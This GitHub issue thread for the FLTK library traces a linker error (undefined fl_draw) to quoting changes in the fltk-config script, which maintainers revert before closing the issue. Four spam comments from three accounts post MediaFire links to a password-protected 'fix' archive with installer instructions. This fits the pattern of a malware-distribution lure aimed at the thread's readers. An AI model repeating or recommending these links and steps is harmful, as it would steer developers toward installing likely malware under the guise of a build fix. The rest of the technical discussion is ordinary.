### ISSUE TITLE
Linker error caused by broken fltk-config

### ISSUE THREAD

**Issue by wcout** [fltk/fltk#1054]
**Describe the bug**
Apart from the issue with `fltk-config` and `ldstaticflags` (see #17), there is an issue with `fl_draw(char const*, int, int, int, int, unsigned int, Fl_Image*, int)'` not been found by the linker.

**To Reproduce**

e.g. in `test` folder try to compile `fonts.cxx` using:

````
g++ -o fonts `../fltk-config --cxxflags` fonts.cxx `../fltk-config --ldstaticflags`
/usr/bin/ld: /tmp/ccWORgWf.o: in function `FontDisplay::draw()':
fonts.cxx:(.text+0xb6): undefined reference to `fl_draw(char const*, int, int, int, int, unsigned int, Fl_Image*, int)'
collect2: error: ld returned 1 exit status
```` 
**Expected behavior**
Symbol should be resolved.

**FLTK Version**
 - Version: 1.4 git current c7417f793f192993f2c6a2a1634ba1ec481d311e
 
**Operating System / Platform:**
 - OS: Linux Ubuntu 20.04

**Linux/Unix Runtime, if applicable:**
 - X11 build

**Additional:**

The FLTK documentation for this function at https://fltk.gitlab.io/fltk/drawing.html#drawing_text is without link:
 
![grafik](https://github.com/user-attachments/assets/ca0a2fe3-9faf-4e21-9e5f-418b7b45fb5e)

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MatthiasWM** [comment]
This function has now a new additional argument. Make sure that you use the correct header files with the same release of your library files.

**Comment by wcout** [comment]
> This function has now a new additional argument. Make sure that you use the correct header files with the same release of your library files.

Yes, true I had an installed version of FLTK too, that did not have this new function. Installing the current version fixes the problem.

But: Shoudn't `fltk-config` (when using the one from a working direcory) set the include and library path so, that it uses the files from a working directory? I never had any problem yet with an installed version and compiling in a working version.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ManoloFLTK** [comment]
Here is what I get here under Ubuntu 24.04 when compiling fonts.cxx with the `fltk-config` shell file of locally-built FLTK : 
```
./fltk-config --compile fonts.cxx
/usr/bin/c++ -I'/home/XXX/build' -I'/home/XXX/macshared/fltk-macshared' -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D_THREAD_SAFE -D_REENTRANT -o fonts fonts.cxx '/home/XXX/build/lib/libfltk.a' -lm -lX11 -lXext -lpthread -lXinerama -lXfixes -lXcursor -lXft -lXrender -lfontconfig -ldl
```
No problem appears. The include and link paths do use the adequate locally-built elements.

**Comment by ManoloFLTK** [comment]
Caution: after CMake-guided building, one finds two `fltk-config` files, one is in the `build` directory and is for the locally-built FLTK, one is in `build/bin/` to be installled and to use the installed FLTK. You probably have used the latter instead of the former.

**Comment by ManoloFLTK** [comment]
The one in `build/bin` is not executable, that's the hint to not use it directly. For sure, it's easy to get confused.

**Comment by wcout** [comment]
@ManoloFLTK I have a pure make build. No cmake involved. So I am using the `fltk-config` from the root dir.
Also compiling with `--compile` works fine for me, but not when using the split compile/link method with static flags, as you can see in my report.

**Comment by ManoloFLTK** [comment]
OK. I can reproduce the issue. That's again a consequence of wanting to support space-containing pathnames……

**Comment by Albrecht-S** [comment]
@ManoloFLTK and others: I reverted parts of PR #17 by removing all single quotes that have been added to `fltk-config.in` with the intention to support spaces in pathnames. Note that some double quotes have been left intentionally.

@wcout Does commit 86241ea9b5afefe0ac9dc744f58fb669eed1f76c fix the issue for you? Please confirm, this is only about `fltk-config` used e.g. in Makefiles etc.. It has nothing to do with fl_draw() but I assume that this specific issue has been solved anyway.

**Comment by wcout** [comment]
@Albrecht-S Yes, `fltk-config` local build works now as before.
You may change the title, if you like...

**Comment by Albrecht-S** [comment]
Thanks for confirmation. Closing this issue.
